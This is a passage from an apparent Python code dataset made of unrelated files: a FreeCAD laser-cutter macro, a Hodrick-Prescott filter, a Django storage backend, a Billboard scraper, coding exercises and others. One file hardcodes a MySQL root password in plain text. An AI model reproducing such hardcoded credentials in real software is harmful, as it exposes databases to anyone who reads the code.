float('inf')\n assert train_size_per_class > 0\n my_dict = defaultdict(list)\n # group image paths by class label (plain loop; a comprehension used only for side effects is unidiomatic)\n for e in dataset_train.imgs:\n my_dict[e[1]].append(e[0])\n train_imgs = []\n for k in my_dict.keys():\n imgs = my_dict[k]\n adapted_train_size = min(train_size_per_class, len(imgs))\n train_indices, = random_subsets((adapted_train_size,),\n len(imgs),\n seed=1234 + int(k))\n train_imgs += [(imgs[idx], int(k)) for idx in train_indices]\n np.random.shuffle(train_imgs)\n dataset_train.imgs = train_imgs\n else:\n train_indices, val_indices = random_subsets((train_size, val_size),\n len(dataset_train),\n seed=1234)\n\n dataset_train = Subset(dataset_train, train_indices)\n dataset_val = Subset(dataset_val, val_indices)\n\n return dataset_train, dataset_val\n","repo_name":"oval-group/smooth-topk","sub_path":"experiments/data/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":242,"dataset":"github-code","pt":"47"}
{"seq_id":"21103182895","text":"from utils import AoCDay\nfrom functools import cache\n\n\nclass Day10(AoCDay):\n grid: list[list[bool]]\n\n def load(self):\n self.grid = [[c == \"#\" for c in line] for line in self.lines]\n\n def raycast_and_count(self, r: int, c: int):\n # tuple comparison needs !=; 'is not' checks identity and is True for every freshly built tuple\n targets = [a for a in self.get_all_asteroids() if a != (r, c)]\n lines = [\n # bind t as a default argument so each lambda keeps its own target;\n # a bare closure would capture only the last t of the loop\n lambda x, t=t: ((r - t[0])/(c - t[1]))*(x-t[1])\n for t in targets\n ]\n return lines\n\n @cache\n def get_all_asteroids(self) -> set[tuple[int, int]]:\n asteroids = set()\n for r in range(len(self.grid)):\n for c in range(len(self.grid[0])):\n if self.grid[r][c]:\n asteroids.add((r, c))\n return asteroids\n\n\n def part1(self):\n self.load()\n\n print(self.get_all_asteroids())\n print([f(4) for f in self.raycast_and_count(4, 4)])\n","repo_name":"ninjawarrior1337/AoC","sub_path":"2019/days/Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"19940145327","text":"# -*- coding: utf-8 -*-\n\n# compatible with Python 3\n\nimport os\nimport FreeCAD as app\nimport FreeCADGui as gui\nfrom FreeCAD import Vector, Rotation\nimport Part\nimport math\n\n\niconPath = os.path.dirname(__file__)\n\nepsilon = 1e-7 \n \nclass LasercutterTechdrawExportItem:\n def __init__(self, \n fp, # an instance of Part::FeaturePython\n Part = None,\n BeamWidth = 0.2,\n Normal = Vector(0, 0, 0),\n method = 'auto'):\n self.updating = False\n fp.addProperty('App::PropertyLink', 'Part', 'LasercutterTechdrawExport', 'Selected part').Part = Part\n fp.addProperty('App::PropertyVector', 'Normal', 'LasercutterTechdrawExport', 'vertical vector. 
(0, 0, 0) = rotate the part that it fits best').Normal = Normal\n fp.addProperty('App::PropertyFloat', 'BeamWidth', 'LasercutterTechdrawExport', 'Laser beam width in mm').BeamWidth = BeamWidth\n fp.addProperty('App::PropertyEnumeration', 'Method', 'LasercutterTechdrawExport', 'How to create the outline').Method = ['auto', '2D', '3D', 'face', 'normal']\n fp.Method = method\n fp.Proxy = self\n \n def execute(self, fp):\n '''Do something when doing a recomputation, this method is mandatory'''\n if fp.Part and fp.Normal and (not self.updating):\n self.make_outline(fp)\n \n def onChanged(self, fp, prop):\n '''Do something when a property has changed'''\n props = ['Part', 'BeamWidth', 'Normal', 'Method']\n if prop in props:\n self.execute(fp) \n \n def make_outline(self, fp): \n self.updating = True \n \n if fp.Method == 'normal': \n outline = fp.Part.Shape.makeOffsetShape(fp.BeamWidth / 2, 1e-7)\n elif fp.Method == '2D':\n outline = fp.Part.Shape.makeOffset2D(fp.BeamWidth / 2) \n fp.Normal = self.getNormal(fp.Part) \n elif fp.Method == '3D':\n outline = fp.Part.Shape.makeOffsetShape(fp.BeamWidth / 2, 1e-7)\n fp.Normal = self.getNormal(fp.Part) \n else:\n face = self.get_biggest_face(fp.Part)\n if face:\n outline = face.makeOffset2D(fp.BeamWidth / 2)\n fp.Normal = face.normalAt(0, 0)\n elif fp.Method == 'auto':\n try:\n outline = fp.Part.Shape.makeOffset2D(fp.BeamWidth / 2) \n except Exception as ex:\n outline = fp.Part.Shape.makeOffsetShape(fp.BeamWidth / 2, 1e-7) \n \n fp.Normal = self.getNormal(fp.Part) \n \n fp.Shape = Part.Compound(outline.Wires)\n fp.Label = fp.Part.Label + ' offset'\n fp.Placement = outline.Placement\n \n if fp.Placement.Rotation.Axis.z < 0:\n fp.Placement.Rotation.Axis = fp.Placement.Rotation.Axis * -1\n \n if fp.Method != 'normal': \n if fp.Normal.z < 0:\n fp.Normal = fp.Normal * -1\n \n rotation_to_apply = Rotation(fp.Normal, Vector(0, 0, 1)) \n new_rotation = rotation_to_apply.multiply(fp.Placement.Rotation)\n fp.Placement.Rotation = new_rotation\n \n self.rotate_biggest_side_up(fp)\n \n self.updating = False\n \n def get_biggest_face(self, part):\n max_area = 0\n max_face = None\n for face in part.Shape.Faces:\n if face and face.Area > max_area:\n max_area = face.Area\n max_face = face\n \n if max_face:\n return max_face\n \n def rotate_biggest_side_up(self, fp):\n bbox = fp.Shape.optimalBoundingBox()\n xmin = bbox.XLength\n angle = 0.0\n r = fp.Placement.Rotation\n r_best = r\n step = 180 / 16\n while angle + step < 180: \n angle = angle + step \n rotation_to_apply = Rotation()\n rotation_to_apply.Axis = Vector(0, 0, 1) \n rotation_to_apply.Angle = math.radians(angle) \n fp.Placement.Rotation = rotation_to_apply.multiply(r)\n bbox = fp.Shape.optimalBoundingBox()\n \n if xmin > bbox.XLength:\n xmin = bbox.XLength\n r_best = fp.Placement.Rotation\n \n fp.Placement.Rotation = r_best\n \n def getNormal(self, obj):\n if hasattr(obj, 'Dir'):\n return obj.Dir\n else:\n bbox = obj.Shape.BoundBox\n if bbox.XLength < epsilon: return Vector(1.0,0.0,0.0)\n elif bbox.YLength < epsilon: return Vector(0.0,1.0,0.0)\n elif bbox.ZLength < epsilon: return Vector(0.0,0.0,1.0)\n return obj.Placement.Rotation.multVec(Vector(0, 0, 1))\n\n\nclass LasercutterTechdrawExportItemViewProvider:\n def __init__(self, vobj):\n '''Set this object to the proxy object of the actual view provider'''\n vobj.Proxy = self\n self.Object = vobj.Object\n \n def getIcon(self):\n '''Return the icon which will appear in the tree view. 
This method is optional and if not defined a default icon is shown.'''\n return (os.path.join(iconPath, 'LasercutterTechdrawExport.svg'))\n\n def attach(self, vobj):\n '''Setup the scene sub-graph of the view provider, this method is mandatory'''\n self.Object = vobj.Object\n self.onChanged(vobj, 'Base')\n \n def updateData(self, fp, prop):\n '''If a property of the handled feature has changed we have the chance to handle this here'''\n pass\n \n def claimChildren(self):\n '''Return a list of objects that will be modified by this feature'''\n pass\n \n def onDelete(self, feature, subelements):\n '''Here we can do something when the feature will be deleted'''\n return True\n \n def onChanged(self, fp, prop):\n '''Here we can do something when a single property got changed'''\n pass\n \n def setEdit(self, vobj=None, mode=0):\n return False\n \n def __getstate__(self):\n '''When saving the document this object gets stored using Python's json module.\\\n Since we have some un-serializable parts here -- the Coin stuff -- we must define this method\\\n to return a tuple of all serializable objects or None.'''\n return None\n \n def __setstate__(self,state):\n '''When restoring the serialized object from document we have the chance to set some internals here.\\\n Since no data were serialized nothing needs to be done here.'''\n return None\n \n\n\ndef selected_to_techdraw(doc, offsets, techdraw, BeamWidth):\n x = BeamWidth\n y = 0\n \n for offset in offsets:\n viewname = offset.Label.replace('offset', 'contour')\n views = doc.getObjectsByLabel(viewname)\n if len(views) > 0:\n view = views[0]\n else:\n view = doc.addObject('TechDraw::DrawViewPart', viewname)\n techdraw.addView(view)\n \n try:\n view.CoarseView = False\n view.ViewObject.LineWidth = BeamWidth\n view.Source = offset\n view.Direction = Vector(0, 0, 1)\n view.ScaleType = u'Custom'\n view.Scale = 1.00\n except Exception as ex:\n app.Console.PrintError('\\nview for ' + viewname + ' cannot be created ! 
')\n app.Console.PrintError(ex)\n \n for view in techdraw.Views:\n offset = view.Source[0]\n bbox = offset.Shape.BoundBox\n bsize = Vector(bbox.XLength, bbox.YLength, bbox.ZLength)\n \n # add a 2D view to the TechDraw page right of the last part\n maxheight = y + bsize.y + BeamWidth\n if maxheight > techdraw.Template.Height:\n techdraw.Template.Height = maxheight\n\n maxwidth = x + bsize.x + BeamWidth\n if maxwidth > techdraw.Template.Width:\n techdraw.Template.Width = maxwidth\n \n view.X = x + bsize.x / 2\n view.Y = y + bsize.y - (bsize.y / 2)\n x = x + bsize.x + BeamWidth\n\ndef makeLasercutterTechdrawExport(parts, BeamWidth = 0.2, doc = app.activeDocument(), method = 'auto', normal = Vector(0, 0, 0)):\n if len(parts) == 0: return\n \n techdraw = doc.addObject('TechDraw::DrawPage','LasercutterTechdraw')\n template = doc.addObject('TechDraw::DrawSVGTemplate','Template')\n techdraw.Template = template\n doc.recompute()\n \n for p in parts:\n if len(p.Shape.Solids) > 1:\n for sol in p.Shape.Solids:\n sfp = doc.addObject('Part::Feature', p.Label) \n sfp.Shape = Part.Shape(sol)\n sfp.ViewObject.hide()\n addToExportObjects(doc, sfp)\n addLasercutterTechdrawItem(techdraw, sfp, BeamWidth, doc, method, normal)\n \n else:\n addLasercutterTechdrawItem(techdraw, p, BeamWidth, doc, method, normal)\n \n doc.recompute() \n techdraw.ViewObject.show() \n return techdraw\n \n \ndef addLasercutterTechdrawItem(techdraw, part, BeamWidth = 0.2, doc = app.activeDocument(), method = 'auto', normal = Vector(0, 0, 0)): \n ifp = doc.addObject('Part::FeaturePython', 'LasercutterTechdrawExport')\n LasercutterTechdrawExportItem(ifp, part, BeamWidth, method=method, Normal=normal)\n LasercutterTechdrawExportItemViewProvider(ifp.ViewObject)\n doc.recompute()\n selected_to_techdraw(doc, [ifp], techdraw, BeamWidth)\n addToExportObjects(doc, ifp)\n return ifp\n \ndef addToExportObjects(doc, ifp):\n LaserCutterExportObjects = doc.getObjectsByLabel('LaserCutterExportObjects')\n if len(LaserCutterExportObjects) == 0:\n LaserCutterExportObjects = doc.addObject('App::DocumentObjectGroup', 'LaserCutterExportObjects')\n else:\n LaserCutterExportObjects = LaserCutterExportObjects[0]\n \n LaserCutterExportObjects.Group = LaserCutterExportObjects.Group + [ifp]\n LaserCutterExportObjects.ViewObject.hide()\n","repo_name":"FreeCAD/FreeCAD-macros","sub_path":"TechDraw/LasercutterSVGExport/LasercutterTechdrawExport.py","file_name":"LasercutterTechdrawExport.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"47"} +{"seq_id":"39779097005","text":"import class_person\nimport termtables as tt\n\nimport os\n\ndef clear_screen():\n print (\"\\n\" * 100)\n\n\ndef b_day_reedable(year, month, day):\n months={\n 1:\"Jan\",\n 2:\"Feb\",\n 3:\"Mar\",\n 4:\"Apr\",\n 5:\"May\",\n 6:\"Jun\",\n 7:\"Jul\",\n 8:\"Aug\",\n 9:\"Sep\",\n 10:\"Oct\",\n 11:\"Nov\",\n 12:\"Dec\"\n }\n return day, months[int(month)], year\n\n\n\ndef disp(Data_base):\n clear_screen()\n table=[]\n for person in Data_base:\n p_table=[]\n p_table.append(person.num_id)\n p_table.append(person.first_name)\n p_table.append(person.surname)\n date=b_day_reedable(person.birth_year, person.birth_month, person.birth_day)\n p_table.append(date[0] +\" \"+ date[1] +\" \"+ date[2])\n p_table.append(person.position)\n p_table.append(person.pesel)\n table.append(p_table)\n\n\n string = tt.to_string(\n [table],\n header=[\"ID\", \"First name\", \"Surname\", \"Date of birth\" , \"Position\", \"Pesel\"],\n 
style=tt.styles.ascii_thin_double,\n # alignment=\"ll\",\n # padding=(0, 1),\n )\n print(string)\n\n input(\"Press Enter to continue...\")\n\n\n","repo_name":"mvtthxw/workers_database","sub_path":"display_db.py","file_name":"display_db.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"3878997379","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\ndef inverse_series(s):\n indices = s.index\n values = s.values\n\n return pd.Series(indices, index = values)\n\ndef main():\n test_series = pd.Series([1, 2,3, 1], index = ['w', 'x','y','z'])\n print(test_series)\n print(inverse_series(test_series))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"immortalRegis/MOOC-Helsinki-Data-Analysis-with-Python","sub_path":"part03-e15_inverse_series/src/inverse_series.py","file_name":"inverse_series.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"30125582848","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('typecars', '0002_auto_20150721_1022'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='models',\n options={'ordering': ['-id'], 'verbose_name': 'Model', 'verbose_name_plural': 'Models'},\n ),\n migrations.AlterField(\n model_name='models',\n name='brand',\n field=models.ForeignKey(related_name='brand_models', to='typecars.Brands'),\n ),\n migrations.AlterField(\n model_name='models',\n name='service_frequency_mileage',\n field=models.IntegerField(),\n ),\n ]\n","repo_name":"burmystrov/wapp","sub_path":"typecars/migrations/0003_auto_20150723_1205.py","file_name":"0003_auto_20150723_1205.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"21452710803","text":"__author__ = 'LY'\n__date__ = '2019/9/18 17:06'\nfrom django.core.files.storage import Storage\nfrom django.conf import settings\nfrom fdfs_client.client import *\n\n\nclass FDFSStorage(Storage):\n def __init__(self, client_conf=None, base_url=None):\n \"\"\"Initialize.\"\"\"\n if client_conf is None:\n client_conf = settings.FDFS_CLIENT_CONF\n self.client_conf = client_conf\n\n if base_url is None:\n base_url = settings.FDFS_URL\n self.base_url = base_url\n\n def _open(self, name, mode='rb'):\n # called when opening a file\n pass\n def _save(self, name, content):\n client = Fdfs_client('./utils/fdfs/client.conf')\n\n # trackers = get_tracker_conf('./utils/fdfs/client.conf')\n # client = Fdfs_client(trackers)\n\n\n res = client.upload_by_buffer(content.read())\n if res.get('Status') != 'Upload successed.':\n raise Exception('Failed to upload the file to FastDFS')\n\n filename = res.get('Remote file_id')\n\n return filename\n\n def exists(self, name):\n \"\"\"Used by Django to check whether the file name is available\"\"\"\n return False\n\n def url(self, name):\n \"\"\"Return the URL path used to access the file\"\"\"\n return self.base_url + name","repo_name":"LuckyRyan-web/dailyfresh-xadmin","sub_path":"utils/fdfs/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"}
{"seq_id":"13818254018","text":"def solution(people, limit):\n answer = 0\n start, end = 0, len(people)-1\n people.sort()\n \n while people[end] >= limit:\n end-=1\n answer+=1\n \n while end >= start:\n tmp = 
people[end]\n end-=1\n while tmp + people[start] <= limit:\n tmp+=people[start]\n start+=1\n if start > end: break\n answer+=1\n \n return answer\n","repo_name":"leejuye/coding-test","sub_path":"programmers/python/구명보트.py","file_name":"구명보트.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"72837592784","text":"import pandas as pd\r\nfrom pandas.io import sql\r\nimport mysql.connector\r\nfrom sqlalchemy import create_engine\r\n\r\nconfig = {\r\n \"host\": \"localhost\",\r\n \"user\": \"root\",\r\n \"password\": \"82276300\",\r\n}\r\nclass my_SQL:\r\n def __init__(self, st):\r\n self.st = st\r\n self.db = mysql.connector.connect(**config)\r\n self.cursor = self.db.cursor()\r\n self.cursor.execute(\"create database IF NOT EXISTS Power_Prediction\")\r\n config['database'] = \"Power_Prediction\"\r\n\r\n self.con = mysql.connector.connect(**config)\r\n self.cursor = self.con.cursor()\r\n\r\n def check_table(self):\r\n stmt = \"SHOW TABLES LIKE 'Historical_Power_Data'\"\r\n self.cursor.execute(stmt)\r\n result = self.cursor.fetchone()\r\n if result:\r\n return True\r\n else:\r\n return False\r\n\r\n def create_historical_table(self, file_path):\r\n try:\r\n engine = create_engine(\"mysql+pymysql://{user}:{pw}@{host}/{db}\"\r\n .format(host=\"localhost\", db=\"Power_Prediction\", user=\"root\", pw=\"82276300\"))\r\n\r\n con = engine.connect()\r\n\r\n df = pd.read_csv(file_path)\r\n\r\n df.to_sql(con=con, name='Historical_Power_Data',\r\n if_exists='replace', index=False)\r\n\r\n return None\r\n\r\n except (mysql.connector.Error, ValueError) as err:\r\n\r\n return err\r\n\r\n","repo_name":"rohollahyousefpour/powerprediction","sub_path":"database_Manage.py","file_name":"database_Manage.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"29149527038","text":"import torch\nimport os\nfrom glob2 import glob\nfrom torchvision import datasets, transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nfrom torch.distributed.optim import DistributedOptimizer\nimport torch.distributed.autograd as dist_autograd\n\nimport lithopsext\nimport lithops\n\nlithops.utils.setup_lithops_logger(log_level='DEBUG')\n\n# def upload_data():\n# storage = lithops.storage.Storage()\n# for obj in glob(os.path.expanduser('~/Downloads/mnist_png/*/*/*')):\n# # print(obj)\n# with open(obj, 'rb') as file:\n# data = file.read()\n# key = obj.split('mnist_png/', 1)[1]\n# storage.put_object(bucket='aitor-data', key='mnist_png/{}'.format(key), body=data)\n#\n# upload_data()\n\ntrain_dataset = lithopsext.datasets.ObjectBag.s3_glob('s3://aitor-data/mnist_png/training/*',\n batch_size=1000,\n lazy_loading=True)\nprint(train_dataset)\n\n\ndef get_accuracy(test_loader, model):\n model.eval()\n correct_sum = 0\n with torch.no_grad():\n for i, (data, target) in enumerate(test_loader):\n out = model(data) # Net.forward takes a single input tensor\n pred = out.argmax(dim=1, keepdim=True)\n correct = pred.eq(target.view_as(pred)).sum().item()\n correct_sum += correct\n\n print(f\"Accuracy {correct_sum / len(test_loader.dataset)}\")\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(9216, 128)\n self.fc2 = 
nn.Linear(128, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.max_pool2d(x, 2)\n\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n # Move tensor to next device if necessary\n next_device = next(self.fc1.parameters()).device\n x = x.to(next_device)\n\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n return output\n\n\ndef training_loop(training_data_chunk, iterations, test_loader):\n net = Net()\n\n for _ in range(iterations):\n data, target = next(training_data_chunk)\n net.zero_grad()\n output = net(data) # forward pass on the batch tensor, not on the chunk iterator\n loss = F.nll_loss(output, target)\n loss.backward()\n # return the per-parameter gradients of the last batch (assumes the caller aggregates them)\n return [p.grad for p in net.parameters()]\n\n\n# Hypothetical driver, assuming the ObjectBag above yields (data, target) batches:\n# training_loop(iter(train_dataset), iterations=10, test_loader=None)\n","repo_name":"aitorarjona/dd-lithops","sub_path":"parameter_server_lithops.py","file_name":"parameter_server_lithops.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"35810825150","text":"import numpy as np\nfrom scipy.linalg import cho_factor, cho_solve\nfrom statsmodels.tools.validation import array_like, PandasWrapper\n\ndef hprescott(X, side=2, smooth=1600, freq=''):\n '''\n Hodrick-Prescott filter with the option to use either the standard two-sided \n or one-sided implementation. The two-sided implementation leads to results\n equivalent to the statsmodels.tsa hpfilter function.\n \n Parameters\n ----------\n X : array-like\n The time series to filter (1-d); multivariate support still needs to be added.\n \n side : int\n The implementation requested. The function will default to the standard\n two-sided implementation.\n \n smooth : float \n The Hodrick-Prescott smoothing parameter. A value of 1600 is\n suggested for quarterly data. Ravn and Uhlig suggest using a value\n of 6.25 (1600/4**4) for annual data and 129600 (1600*3**4) for monthly\n data. The function will default to using the quarterly parameter (1600).\n\n freq : str\n Optional parameter to specify the frequency of the data. Will override\n the smoothing parameter and implement using the suggested value from\n Ravn and Uhlig. Accepts annual (a), quarterly (q), or monthly (m)\n frequencies.\n\n Returns\n -------\n \n cycle : ndarray\n The estimated cycle in the data given side implementation and the \n smoothing parameter.\n \n trend : ndarray\n The estimated trend in the data given side implementation and the \n smoothing parameter.\n \n References\n ----------\n Hodrick, R.J, and E. C. Prescott. 1980. \"Postwar U.S. Business Cycles: An\n Empirical Investigation.\" `Carnegie Mellon University discussion\n paper no. 451`.\n \n Meyer-Gohde, A. 2010. \"Matlab code for one-sided HP-filters.\"\n `Quantitative Macroeconomics & Real Business Cycles, QM&RBC Codes 181`.\n \n Ravn, M.O and H. Uhlig. 2002. 
\"Notes On Adjusted the Hodrick-Prescott\n Filter for the Frequency of Observations.\" `The Review of Economics and\n Statistics`, 84(2), 371-80.\n \n Examples\n --------\n from statsmodels.api import datasets, tsa\n import pandas as pd\n dta = datasets.macrodata.load_pandas().data\n index = pd.DatetimeIndex(start='1959Q1', end='2009Q4', freq='Q')\n dta.set_index(index, inplace=True)\n \n #Run original tsa.filters two-sided hp filter\n cycle_tsa, trend_ts = tsa.filters.hpfilter(dta.realgdp, 1600)\n #Run two-sided implementation\n cycle2, trend2 = hprescott(dta.realgdp, 2, 1600)\n #Run one-sided implementation\n cycle1, trend1 = hprescott(dta.realgdp, 1, 1600)\n '''\n \n #Determine smooth if a specific frequency is given\n if freq == 'q':\n smooth = 1600 #quarterly\n elif freq == 'a':\n smooth = 6.25 #annually\n elif freq == 'm':\n smooth = 129600 #monthly\n elif freq != '':\n print('''Invalid frequency parameter inputted. Defaulting to defined smooth\n parameter value or 1600 if no value was provided.''')\n \n pw = PandasWrapper(X)\n X = array_like(X, 'X', ndim=1)\n T = len(X)\n \n #Preallocate trend array\n trend = np.zeros(len(X))\n\n #Rearrange the first order conditions of minimization problem to yield matrix\n #First and last two rows are mirrored\n #Middle rows follow same pattern shifting position by 1 each row\n\n a1 = np.array([1+smooth, -2*smooth, smooth])\n a2 = np.array([-2*smooth, 1+5*smooth, -4*smooth, smooth])\n a3 = np.array([smooth, -4*smooth, 1+6*smooth, -4*smooth, smooth])\n \n Abeg = np.concatenate(([np.append([a1],[0])],[a2]))\n Aend = np.concatenate(([a2[3::-1]], [np.append([0],[a1[2::-1]])]))\n \n Atot = np.zeros((T, T))\n Atot[:2,:4] = Abeg\n Atot[-2:,-4:] = Aend\n\t\n for i in range(2, T-2):\n Atot[i,i-2:i+3] = a3\n\t\n if (side == 1):\n t = 2\n trend[:t] = X[:t]\n\n # Third observation minimization problem is as follows\t\n r3 = np.array([-2*smooth, 1+4*smooth, -2*smooth])\n\t\t\n Atmp = np.concatenate(([a1, r3], [a1[2::-1]]))\n Xtmp = X[:t+1]\n\n # Solve the system A*Z = X\n trend[t] = cho_solve(cho_factor(Atmp), Xtmp)[t]\n\t\t\n t += 1\n\n #Pattern begins with fourth observation\n #Create base A matrix with unique first and last two rows\n #Build recursively larger through time period\n Atmp = np.concatenate(([np.append([a1],[0])],[a2],[a2[3::-1]],[np.append([0],a1[2::-1])]))\n Xtmp = X[:t+1]\n\n trend[t] = cho_solve(cho_factor(Atmp), Xtmp)[t]\n\t\t\n while (t < T-1):\n\t\t\n t += 1\n\t\t\t\n Atmp = np.concatenate((Atot[:t-1,:t+1], np.zeros((2, t+1))))\n Atmp[t-1:t+1,t-3:t+1] = Aend\n\n Xtmp = X[:t+1]\n trend[t] = cho_solve(cho_factor(Atmp), Xtmp)[t]\n\t\t\n elif (side== 2):\n trend = cho_solve(cho_factor(Atot), X)\n else:\n raise ValueError('Side Parameter should be 1 or 2')\n\n cyclical = X - trend\n \n return pw.wrap(cyclical, append='cyclical'), pw.wrap(trend, append='trend')\n","repo_name":"OBTCOCA/btc_research","sub_path":"btc_functions/hpfilter.py","file_name":"hpfilter.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"49594072","text":"import requests\nfrom bs4 import BeautifulSoup\n\nbillboard_webpage='http://www.billboard.com/charts/hot-100'\nrequest = requests.get(billboard_webpage)\nsoup = BeautifulSoup(request.text, 'html.parser')\nprettyString = 
soup.prettify().encode('utf-8').strip()\ntitle_instances=soup.find_all('div',attrs={'class':'chart-list-item__title'})\nartist_instances=soup.find_all('div',attrs={'class':'chart-list-item__artist'})\ntitles=[]\nartists=[]\nfor title in title_instances:\n \ttitles.append(title.text.strip())\nfor artist in artist_instances:\n \tartists.append(artist.text.strip())\n\ntop10Titles=titles[:10]\ntop10Artists=artists[:10]\n\ndef getSongAndArtist(song,artist):\n \tid=1\n \tfor i in zip(song,artist):\n \t\tprint('#'+str(id),i[0],'by',i[1])\n \t\tid+=1\n\ngetSongAndArtist(top10Titles,top10Artists)\n\n\n","repo_name":"Maylibooyah69/PythonProject","sub_path":"dscrape/top10songs.py","file_name":"top10songs.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13134980714","text":"import random\r\nimport numpy as np \r\n\r\nclass Listasequencial:\r\n def __init__(self, capacidade):\r\n self.capacidade = capacidade\r\n self.ultima_posicao = -1\r\n self.valores = np.empty(self.capacidade, dtype=int)\r\n\r\n # O(n)\r\n def imprime(self):\r\n if self.ultima_posicao == -1:\r\n print('O vetor está vazio')\r\n else:\r\n for i in range(self.ultima_posicao + 1):\r\n print(i, ' - ', self.valores[i])\r\n\r\n # O(1) - O(2)\r\n def insere(self, valor):\r\n if self.ultima_posicao == self.capacidade - 1:\r\n print('Capacidade máxima atingida')\r\n else:\r\n self.ultima_posicao += 1 \r\n self.valores[self.ultima_posicao] = valor \r\n\r\n # O(n)\r\n def pesquisar(self, valor):\r\n for i in range(self.ultima_posicao + 1):\r\n if valor == self.valores[i]:\r\n return i\r\n return -1\r\n\r\n def pesquisar_indice(self, indice):\r\n for i in range(self.ultima_posicao + 1):\r\n if i == indice:\r\n return self.valores[i]\r\n return -1\r\n\r\n # O(n)\r\n def excluir(self, valor):\r\n posicao = self.pesquisar(valor)\r\n if posicao == -1:\r\n return -1\r\n else:\r\n for i in range(posicao, self.ultima_posicao):\r\n self.valores[i] = self.valores[i + 1]\r\n \r\n self.ultima_posicao -= 1\r\n\r\n def contagem(self, escolha):\r\n indice = self.pesquisar(escolha)\r\n for i in range(escolha):\r\n if indice == self.ultima_posicao:\r\n indice = 0\r\n else:\r\n indice += 1\r\n return indice\r\n\r\n \r\n\r\n'''Construa um programa em Python de acordo com situação problema descrita:\r\nUm grupo de soldados está cercado e não há esperança de vitória, \r\nporém existe somente um cavalo disponível para escapar e buscar por reforços.\r\nPara determinar qual soldado deve escapar para encontrar ajuda, eles formam um círculo (Fila Circular)\r\ne sorteiam um número de um chapéu. Começando por um soldado sorteado aleatoriamente,\r\numa contagem é realizada até o número sorteado. Quando a contagem terminar,\r\no soldado em que a contagem parou é removido do círculo, um novo número é sorteado e\r\na contagem recomeça no soldado seguinte ao que foi eliminado. 
A cada rodada, portanto, o círculo diminui em um,\r\naté que somente um soldado reste e seja escolhido para a tarefa.\r\n'''\r\n\r\n\r\nwhile True:\r\n try:\r\n qntd = int(input(\"Insira a quantidade de soldados: \"))\r\n break\r\n except:\r\n print(\"Comando inválido!\")\r\nlista = Listasequencial(qntd)\r\n\r\nfor i in range(qntd):\r\n while True:\r\n try:\r\n sold = int(input(f\"Nº do id do {i+1}º soldado: \"))\r\n break\r\n except:\r\n print(\"Comando inválido!\")\r\n lista.insere(sold)\r\n\r\n\r\n\r\nwhile lista.ultima_posicao > 0:\r\n esco1 = random.choice(lista.valores)\r\n print(f'\\nSoldado sorteado: Nº {esco1}\\n')\r\n print(\"Lista de soldados antes da remoção\")\r\n lista.imprime()\r\n ind_sold_apagado = lista.contagem(esco1)\r\n sold_apagado = lista.pesquisar_indice(ind_sold_apagado)\r\n print(f'\\nSoldado retirado da lista: {sold_apagado}')\r\n lista.excluir(sold_apagado)\r\n print('''\r\nLista de soldados depois da remoção\r\nÍndice - Soldado''')\r\n lista.imprime()\r\n\r\nprint(f'\\nO soldado ganhador é o soldado Nº {lista.valores[0]}')\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"mateuscpg/estrutura_de_dados","sub_path":"soldado_ganhador.py","file_name":"soldado_ganhador.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21929220024","text":"# Задание 6\na = int(input(\"Введите расстояние, которое спортсмен пробежал в первый день \"))\nb = int(input(\"Введите расстояние, которое спортсмен должен пробежать на определяемый день \"))\ndays = 1\nprint(f\"{days}-й день: {a}\")\nwhile a < b:\n a = round (a + a * 0.1, 2)\n days += 1\n if a <= b:\n print(f\"{days}-й день: {a}\")\n else:\n print(f\"{days}-й день: {a}\")\nelse:\n print(f\"Ответ: на {days}-й день спортсмен достиг результата — не менее {b} 